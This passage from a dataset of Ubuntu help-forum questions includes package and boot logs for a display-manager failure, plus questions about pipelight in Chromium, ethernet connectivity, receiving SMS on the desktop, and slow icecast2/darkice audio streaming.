00:33:18 status triggers-pending mime-support : all 3.54ubuntu1 2014-05-20 00:33:18 status half-installed vlc : i386 2.1.2-2build2 2014-05-20 00:33:18 status unpacked vlc : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:18 status unpacked vlc : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:19 upgrade libvlccore7 : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:19 status half-configured libvlccore7 : i386 2.1.2-2build2 2014-05-20 00:33:19 status unpacked libvlccore7 : i386 2.1.2-2build2 2014-05-20 00:33:19 status half-installed libvlccore7 : i386 2.1.2-2build2 2014-05-20 00:33:19 status half-installed libvlccore7 : i386 2.1.2-2build2 2014-05-20 00:33:19 status unpacked libvlccore7 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:19 status unpacked libvlccore7 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:20 upgrade vlc-data : all 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:20 status half-configured vlc-data : all 2.1.2-2build2 2014-05-20 00:33:20 status unpacked vlc-data : all 2.1.2-2build2 2014-05-20 00:33:20 status half-installed vlc-data : all 2.1.2-2build2 2014-05-20 00:33:21 status triggers-pending hicolor-icon-theme : all 0.13-1 2014-05-20 00:33:21 status half-installed vlc-data : all 2.1.2-2build2 2014-05-20 00:33:23 status half-installed vlc-data : all 2.1.2-2build2 2014-05-20 00:33:23 status unpacked vlc-data : all 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:23 status unpacked vlc-data : all 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:24 upgrade vlc-nox : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:24 status half-configured vlc-nox : i386 2.1.2-2build2 2014-05-20 00:33:24 status unpacked vlc-nox : i386 2.1.2-2build2 2014-05-20 00:33:24 status half-installed vlc-nox : i386 2.1.2-2build2 2014-05-20 00:33:25 status half-installed vlc-nox : i386 2.1.2-2build2 2014-05-20 00:33:25 status unpacked vlc-nox : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:25 status unpacked vlc-nox : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:26 upgrade libvlc5 : i386 2.1.2-2build2 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:26 status half-configured libvlc5 : i386 2.1.2-2build2 2014-05-20 00:33:26 status unpacked libvlc5 : i386 2.1.2-2build2 2014-05-20 00:33:26 status half-installed libvlc5 : i386 2.1.2-2build2 2014-05-20 00:33:26 status half-installed libvlc5 : i386 2.1.2-2build2 2014-05-20 00:33:26 status unpacked libvlc5 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:26 status unpacked libvlc5 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:27 upgrade network-manager-gnome : i386 0.9.8.8-0ubuntu4 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:27 status half-configured network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status unpacked network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status triggers-pending gconf2 : i386 3.2.6-0ubuntu2 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status triggers-pending libglib2.0-0 : i386 2.40.0-2 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:27 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status half-installed network-manager-gnome : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status unpacked network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:28 status unpacked network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:28 upgrade libnm-gtk-dev : i386 0.9.8.8-0ubuntu4 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:28 status half-configured libnm-gtk-dev : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status unpacked libnm-gtk-dev : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status half-installed libnm-gtk-dev : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status half-installed libnm-gtk-dev : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:28 status unpacked libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:29 status unpacked libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:29 upgrade libnm-gtk0 : i386 0.9.8.8-0ubuntu4 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:29 status half-configured libnm-gtk0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:29 status unpacked libnm-gtk0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:29 status half-installed libnm-gtk0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:29 status half-installed libnm-gtk0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:29 status unpacked libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:29 status unpacked libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:30 upgrade libnm-gtk-common : all 0.9.8.8-0ubuntu4 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:30 status half-configured libnm-gtk-common : all 0.9.8.8-0ubuntu4 2014-05-20 00:33:30 status unpacked libnm-gtk-common : all 0.9.8.8-0ubuntu4 2014-05-20 00:33:30 status half-installed libnm-gtk-common : all 0.9.8.8-0ubuntu4 2014-05-20 00:33:30 status half-installed libnm-gtk-common : all 0.9.8.8-0ubuntu4 2014-05-20 00:33:30 status unpacked libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:30 status unpacked libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:30 upgrade gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:30 status half-configured gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:31 status unpacked gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:31 status half-installed gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:31 status half-installed gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4 2014-05-20 00:33:31 status unpacked gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:31 status unpacked gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:31 trigproc mime-support : all 3.54ubuntu1 3.54ubuntu1 2014-05-20 00:33:31 status half-configured mime-support : all 3.54ubuntu1 2014-05-20 00:33:36 status installed mime-support : all 3.54ubuntu1 2014-05-20 00:33:36 trigproc man-db : i386 2.6.7.1-1 2.6.7.1-1 2014-05-20 00:33:36 status half-configured man-db : i386 2.6.7.1-1 2014-05-20 00:33:39 status installed man-db : i386 2.6.7.1-1 2014-05-20 00:33:39 trigproc bamfdaemon : i386 0.5.1+14.04.20140409-0ubuntu1 0.5.1+14.04.20140409-0ubuntu1 2014-05-20 00:33:39 status half-configured bamfdaemon : i386 0.5.1+14.04.20140409-0ubuntu1 2014-05-20 00:33:39 status installed bamfdaemon : i386 0.5.1+14.04.20140409-0ubuntu1 2014-05-20 00:33:39 trigproc desktop-file-utils : i386 0.22-1ubuntu1 0.22-1ubuntu1 2014-05-20 00:33:39 status half-configured desktop-file-utils : i386 0.22-1ubuntu1 2014-05-20 00:33:40 status installed desktop-file-utils : i386 0.22-1ubuntu1 2014-05-20 00:33:40 trigproc gnome-menus : i386 3.10.1-0ubuntu2 3.10.1-0ubuntu2 2014-05-20 00:33:40 status half-configured gnome-menus : i386 3.10.1-0ubuntu2 2014-05-20 00:33:40 status installed gnome-menus : i386 3.10.1-0ubuntu2 2014-05-20 00:33:40 trigproc hicolor-icon-theme : all 0.13-1 0.13-1 2014-05-20 00:33:40 status half-configured hicolor-icon-theme : all 0.13-1 2014-05-20 00:33:45 status installed hicolor-icon-theme : all 0.13-1 2014-05-20 00:33:45 trigproc gconf2 : i386 3.2.6-0ubuntu2 3.2.6-0ubuntu2 2014-05-20 00:33:45 status half-configured gconf2 : i386 3.2.6-0ubuntu2 2014-05-20 00:33:45 status installed gconf2 : i386 3.2.6-0ubuntu2 2014-05-20 00:33:45 trigproc libglib2.0-0 : i386 2.40.0-2 2.40.0-2 2014-05-20 00:33:45 status half-configured libglib2.0-0 : i386 2.40.0-2 2014-05-20 00:33:47 status installed libglib2.0-0 : i386 2.40.0-2 2014-05-20 00:33:47 startup packages configure 2014-05-20 00:33:47 configure vlc-data : all 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:47 status unpacked vlc-data : all 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:47 status half-configured vlc-data : all 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed vlc-data : all 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 configure libvlccore7 : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked libvlccore7 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status half-configured libvlccore7 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed libvlccore7 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status triggers-pending libc-bin : i386 2.19-0ubuntu6 2014-05-20 00:33:48 configure libvlc5 : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked libvlc5 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status half-configured libvlc5 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed libvlc5 : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 configure vlc-nox : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked vlc-nox : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status half-configured vlc-nox : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed vlc-nox : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 configure vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status half-configured vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed vlc-plugin-pulse : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 configure vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status half-configured vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 status installed vlc-plugin-notify : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:48 configure vlc : i386 2.1.4-0ubuntu14.04.1 < none > 2014-05-20 00:33:48 status unpacked vlc : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:49 status half-configured vlc : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:49 status installed vlc : i386 2.1.4-0ubuntu14.04.1 2014-05-20 00:33:49 configure libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 < none > 2014-05-20 00:33:49 status unpacked libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status half-configured libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status installed libnm-gtk-common : all 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 configure libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 < none > 2014-05-20 00:33:49 status unpacked libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status half-configured libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status installed libnm-gtk0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 configure network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 < none > 2014-05-20 00:33:49 status unpacked network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status unpacked network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status half-configured network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status installed network-manager-gnome : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 configure gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 < none > 2014-05-20 00:33:49 status unpacked gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status half-configured gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status installed gir1.2-nmgtk-1.0 : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 configure libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 < none > 2014-05-20 00:33:49 status unpacked libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status half-configured libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 status installed libnm-gtk-dev : i386 0.9.8.8-0ubuntu4.1 2014-05-20 00:33:49 trigproc libc-bin : i386 2.19-0ubuntu6 < none > 2014-05-20 00:33:49 status half-configured libc-bin : i386 2.19-0ubuntu6 2014-05-20 00:33:50 status installed libc-bin : i386 2.19-0ubuntu6 contents of boot.log when i select gdm as default : resume : libgcrypt version : 1.5.3 * starting mount filesystems on boot [ ok ] * starting fix-up sensitive /proc filesystem entries [ ok ] * starting populate /dev filesystem [ ok ] * starting populate and link to /run filesystem [ ok ] * stopping fix-up sensitive /proc filesystem entries [ ok ] * stopping populate /dev filesystem [ ok ] * stopping populate and link to /run filesystem [ ok ] * stopping track if upstart is running in a container [ ok ] * starting initialize or finalize resolvconf [ ok ] * starting set console keymap [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting set sysctls from /etc/sysctl.conf [ ok ] * starting bridge udev events into upstart [ ok ] * stopping set console keymap [ ok ] * starting signal sysvinit that remote filesystems are mounted [ ok ] * stopping set sysctls from /etc/sysctl.conf [ ok ] * starting device node and kernel event manager [ ok ] * starting load modules from /etc/modules [ ok ] * starting cold plug devices [ ok ] * starting log initial device creation [ ok ] * stopping load modules from /etc/modules [ ok ] * starting configure network device security [ ok ] * starting configure network device security [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * starting bridge socket events into upstart [ ok ] * starting signal sysvinit that the rootfs is mounted [ ok ] * starting configure network device [ ok ] * starting uncomplicated firewall [ ok ] * starting configure network device [ ok ] * starting clean /tmp directory [ ok ] * stopping clean /tmp directory [ ok ] * stopping read required files in advance ( for other mountpoints ) [ ok ] * stopping cold plug devices [ ok ] * stopping log initial device creation [ ok ] * starting enable remaining boot-time encrypted block devices [ ok ] * starting signal sysvinit that local filesystems are mounted [ ok ] * starting restore software rfkill state [ ok ] * starting smb/cifs file server [ ok ] * starting configure network device security [ ok ] * stopping mount filesystems on boot [ ok ] * stopping restore software rfkill state [ ok ] * starting enabling additional executable binary formats [ ok ] * starting flush early job output to logs [ ok ] * stopping failsafe boot delay [ ok ] * starting system v initialisation compatibility [ ok ] * stopping flush early job output to logs [ ok ] * starting configure virtual network devices [ ok ] * starting bridge file events into upstart [ ok ] * starting early crypto disks ... [ ok ] * starting system logging daemon [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] * setting sensors limits [ ok ] * starting smb/cifs file and active directory server [ ok ] * starting d-bus system message bus [ ok ] * stopping system v initialisation compatibility [ ok ] * starting modem connection manager [ ok ] * starting configure network device security [ ok ] * starting systemd login management service [ ok ] * starting system v runlevel compatibility [ ok ] * starting gnome display manager [ ok ] * starting acpi daemon [ ok ] * starting anac ( h ) ronistic cron [ ok ] * starting k display manager [ ok ] * starting save kernel messages [ ok ] * starting regular background program processing daemon [ ok ] * starting deferred execution scheduler [ ok ] * stopping save kernel messages [ ok ] * stopping anac ( h ) ronistic cron [ ok ] * starting bluetooth daemon [ ok ] * starting crash report submission daemon [ ok ] * speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * stopping cpu interrupts balancing daemon [ ok ] * starting gnome display manager [ fail ] * starting automatic crash report generation [ ok ] * starting cups-browsed - bonjour remote printer browsing daemon [ ok ] * stopping restore sound card state [ ok ] * starting smb/cifs file and active directory server [ fail ] * stopping send an event to indicate plymouth is up [ ok ] * stopping k display manager [ ok ] * starting network connection manager [ ok ] starting virtualbox kernel modules * starting cups printing spooler/server [ ok ] * starting samba auto-reload integration [ ok ] * stopping samba auto-reload integration [ ok ] ... done . * starting ntp server ntpd [ ok ] saned disabled ; edit /etc/default/saned * stopping system v runlevel compatibility [ ok ] * stopping teamviewer remote control daemon [ ok ] * starting mount network filesystems [ ok ] * starting samba winbind [ ok ] * stopping mount network filesystems [ ok ] * starting netbios name server [ ok ] * stopping lightdm display manager [ ok ] * stopping read required files in advance [ ok ] contents of boot.log when i select lightdm as default : resume : libgcrypt version : 1.5.3 * stopping read required files in advance [ ok ] * starting mount filesystems on boot [ ok ] * starting populate and link to /run filesystem [ ok ] * stopping populate and link to /run filesystem [ ok ] * starting initialize or finalize resolvconf [ ok ] * stopping track if upstart is running in a container [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting bridge udev events into upstart [ ok ] * starting signal sysvinit that remote filesystems are mounted [ ok ] * starting device node and kernel event manager [ ok ] * starting load modules from /etc/modules [ ok ] * starting cold plug devices [ ok ] * starting log initial device creation [ ok ] * stopping load modules from /etc/modules [ ok ] * starting signal sysvinit that the rootfs is mounted [ ok ] * starting clean /tmp directory [ ok ] * starting configure network device security [ ok ] * stopping clean /tmp directory [ ok ] * starting uncomplicated firewall [ ok ] * starting configure network device [ ok ] * starting configure network device security [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * starting configure network device [ ok ] * starting bridge socket events into upstart [ ok ] * stopping cold plug devices [ ok ] * stopping log initial device creation [ ok ] * starting enable remaining boot-time encrypted block devices [ ok ] * stopping read required files in advance ( for other mountpoints ) [ ok ] * starting smb/cifs file server [ ok ] * starting signal sysvinit that local filesystems are mounted [ ok ] * starting configure network device security [ ok ] * stopping mount filesystems on boot [ ok ] * starting enabling additional executable binary formats [ ok ] * starting flush early job output to logs [ ok ] * stopping failsafe boot delay [ ok ] * starting d-bus system message bus [ ok ] * starting system v initialisation compatibility [ ok ] * stopping flush early job output to logs [ ok ] * starting modem connection manager [ ok ] * starting configure network device security [ ok ] * starting early crypto disks ... [ ok ] * starting bluetooth daemon [ ok ] * starting configure virtual network devices [ ok ] * starting system logging daemon [ ok ] * starting systemd login management service [ ok ] * starting bridge file events into upstart [ ok ] * starting smb/cifs file and active directory server [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] * starting network connection manager [ ok ] * starting smb/cifs file and active directory server [ fail ] * setting sensors limits * starting cups printing spooler/server [ ok ] [ ok ] * starting samba auto-reload integration [ ok ] * stopping samba auto-reload integration [ ok ] * starting cups-browsed - bonjour remote printer browsing daemon [ ok ] * stopping system v initialisation compatibility [ ok ] * speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * starting system v runlevel compatibility [ ok ] * starting acpi daemon [ ok ] * starting anac ( h ) ronistic cron [ ok ] * starting k display manager [ ok ] * starting save kernel messages [ ok ] * starting crash report submission daemon [ ok ] * starting regular background program processing daemon [ ok ] * starting deferred execution scheduler [ ok ] * stopping save kernel messages [ ok ] * stopping anac ( h ) ronistic cron [ ok ] * stopping cpu interrupts balancing daemon [ ok ] * starting automatic crash report generation [ ok ] * stopping restore sound card state [ ok ] * stopping send an event to indicate plymouth is up [ ok ] * stopping teamviewer remote control daemon [ ok ] * stopping k display manager [ ok ] * starting mount network filesystems [ ok ] * starting samba winbind [ ok ] * stopping mount network filesystems [ ok ] * starting netbios name server [ ok ] starting virtualbox kernel modules ... done . * starting ntp server ntpd [ ok ] saned disabled ; edit /etc/default/saned * stopping system v runlevel compatibility [ ok ] * stopping lightdm display manager [ ok ] finally , contents of boot.log when i set the default to kdm ( the only one that is working ) : resume : libgcrypt version : 1.5.3 * stopping read required files in advance [ ok ] * starting mount filesystems on boot [ ok ] * starting populate /dev filesystem [ ok ] * starting populate and link to /run filesystem [ ok ] * stopping populate /dev filesystem [ ok ] * stopping populate and link to /run filesystem [ ok ] * stopping track if upstart is running in a container [ ok ] * starting initialize or finalize resolvconf [ ok ] * starting set console keymap [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ ok ] * starting bridge udev events into upstart [ ok ] * stopping set console keymap [ ok ] * starting signal sysvinit that remote filesystems are mounted [ ok ] * starting device node and kernel event manager [ ok ] * starting load modules from /etc/modules [ ok ] * starting cold plug devices [ ok ] * starting log initial device creation [ ok ] * stopping load modules from /etc/modules [ ok ] * starting configure network device security [ ok ] * starting signal sysvinit that the rootfs is mounted [ ok ] * stopping read required files in advance ( for other mountpoints ) [ ok ] * starting clean /tmp directory [ ok ] * stopping clean /tmp directory [ ok ] * starting uncomplicated firewall [ ok ] * starting configure network device [ ok ] * stopping read required files in advance ( for other mountpoints ) [ ok ] * starting signal sysvinit that local filesystems are mounted [ ok ] * stopping mount filesystems on boot [ ok ] * starting enabling additional executable binary formats [ ok ] * starting flush early job output to logs [ ok ] * starting configure network device security [ ok ] * starting d-bus system message bus [ ok ] * stopping flush early job output to logs [ ok ] * starting systemd login management service [ ok ] * starting bluetooth daemon [ ok ] * starting system logging daemon [ ok ] * starting mount network filesystems [ ok ] * starting failsafe boot delay [ ok ] * starting smb/cifs file server [ ok ] * stopping failsafe boot delay [ ok ] * stopping mount network filesystems [ ok ] * starting system v initialisation compatibility [ ok ] * starting modem connection manager [ ok ] * starting configure network device security [ ok ] * starting configure network device [ ok ] * starting early crypto disks ... [ ok ] * starting bridge file events into upstart [ ok ] * starting bridge socket events into upstart [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] * setting sensors limits [ ok ] * starting network connection manager [ ok ] * starting smb/cifs file and active directory server [ ok ] * starting cups printing spooler/server [ ok ] * stopping cold plug devices [ ok ] * stopping system v initialisation compatibility [ ok ] * starting samba auto-reload integration [ ok ] how can i fix this ?
471594	how to enable pipelight in chromium ?	i have used firefox exclusively for a short while , after i installed 14.04 and pipelight ( silverlight plugin ) works fine . then i installed chrome/chromium and can not get it to work with them . i tried removing it altogether , but no luck . after reinstalling it , again , only activates in firefox .
471597	can not connect to internet through ethernet	when i connect the ethernet to my desktop ( 13.10 ) , it appears to establish a connection but i can not access any web pages . if i connect the ethernet to my laptop ( 12.04.4 ) it works correctly . i have connected to ethernet on my desktop before , but i have recently relocated and i am trying to get it working with my new living arrangement . desktop ( 13.10 ) $ uname -a linux jeffrey-desktop 3.11.0-20-generic # 35-ubuntu smp fri may 2 21:32:49 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ ifconfig eth0 link encap : ethernet hwaddr c8:60:00 : de:4f : bb inet addr:10.212.9.183 bcast:10.212.255.255 mask:255.255.0.0 inet6 addr : fe80 : :ca60 : ff : fede:4fbb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7883 errors:0 dropped:0 overruns:0 frame:0 tx packets:2406 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:841589 ( 841.5 kb ) tx bytes:240759 ( 240.7 kb ) interrupt:20 memory : f7f00000-f7f20000 $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.212.0.1 0.0.0.0 ug 0 0 0 eth0 10.212.0.0 0.0.0.0 255.255.0.0 u 1 0 0 eth0 $ sudo lshw -class network *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : c8:60:00 : de:4f : bb size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=2.3.2-k duplex=full firmware=0.13-4 ip=10.212.9.183 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:52 memory : f7f00000-f7f1ffff memory : f7f39000-f7f39fff ioport : f040 ( size=32 ) laptop ( 12.04.4 ) $ uname -a linux jeffrey-inspiron-3520 3.2.0-61-generic # 93-ubuntu smp fri may 2 21:31:50 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ ifconfig eth0 link encap : ethernet hwaddr e0 : db:55:84 : bc : f0 inet addr:10.212.12.5 bcast:10.212.255.255 mask:255.255.0.0 inet6 addr : fe80 : :e2db:55ff : fe84 : bcf0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7035 errors:0 dropped:0 overruns:0 frame:0 tx packets:2820 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4817604 ( 4.8 mb ) tx bytes:444154 ( 444.1 kb ) interrupt:41 base address:0x4000 $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.212.0.1 0.0.0.0 ug 0 0 0 eth0 10.212.0.0 0.0.0.0 255.255.0.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 $ sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 05 serial : e0 : db:55:84 : bc : f0 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=10.212.12.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff
471601	how to receive texts in ubuntu desktop	i would like to receive and send texts on ubuntu desktop . i would be preferable to receive them via pidgin , and also when my phone is not present . i do not have bluetooth . it is a google voice number , and i have an android device . i also do not want to pay for an app or something . note : most solutions on the web are broken and out of date . at least check if it is more recent than a google policy change .
471602	icecast2 and darkice stream playing too slow	i am trying to access my instantfm usb radio dongle using icecast2 and darkice . i have it set up well enough that when i access the stream ( 192.168.2.108:8000/instantfm ) i do get sound but it is playing extremely slow . can someone tell me what i am doing wrong ? i am fairly proficient with linux , not so much with linux audio . using arecord i am able to capture from the device with the following sudo arecord -q -d 60 -c 2 -d hw:1,0 -r 96000 -f s16_le radio.wav if i set the [ input ] samplerate above 48000 , when i run darkice i get the following : joey @ q6600 : /var/log $ sudo darkice darkice 1.0 live audio streamer , http : //code.google.com/p/darkice/ copyright ( c ) 2000-2007 , tyrell hungary , http : //tyrell.hu/ copyright ( c ) 2008-2010 , akos maroy and rafael diniz this is free software , and you are welcome to redistribute it under the terms of the gnu general public license version 3 or any later version . using config file : /etc/darkice.cfg using alsa dsp input device : hw:1,0 using posix real-time scheduling , priority 98 home directory /home/joey not ours . darkice : lamelibencoder.cpp:261 : lame lib initializing params error [ 0 ] joey @ q6600 : /var/log $ my darkice.cfg : # sample darkice configuration file , edit for your needs before using # see the darkice.cfg man page for details # this section describes general aspects of the live streaming session [ general ] duration = 0 # duration of encoding , in seconds . 0 means forever buffersecs = 5 # size of internal slip buffer , in seconds reconnect = yes # reconnect to the server ( s ) if disconnected # this section describes the audio input that will be streamed [ input ] device = hw:1,0 samplerate = 48000 # 22050 bitspersample = 16 channel = 2 # this section describes a streaming connection to an icecast2 server # there may be up to 8 of these sections , named [ icecast2-0 ] ... [ icecast2-7 ] # these can be mixed with [ icecast-x ] and [ shoutcast-x ] sections [ icecast2-0 ] bitratemode = cbr # average bit rate quality = 0.5 format = mp3 # vorbis # format of the stream : ogg vorbis bitrate = 96 # bitrate of the stream sent to the server server = q6600.home.lan # host name of the server port = 8000 # port of the icecast2 server , usually 8000 password = # # # # # # # # # source password to the icecast2 server mountpoint = instantfm # mount point of this stream on the icecast2 server name = darkice trial # name of the stream description = this is only a trial # description of the stream url = http : //www.home.lan # url related to the stream genre = my own # genre of the stream public = yes # advertise this stream ? localdumpfile = dump.ogg # local dump file os : ubuntu 12.04.3 lts icecast version : 2.3.2 darkice version : 1.0 thanks in advance . after installing and running liquidsoap as instructed below it still plays slowly . output from liquid soap : joey @ q6600 : /var/log $ liquidsoap 'output.icecast ( % vorbis , host = 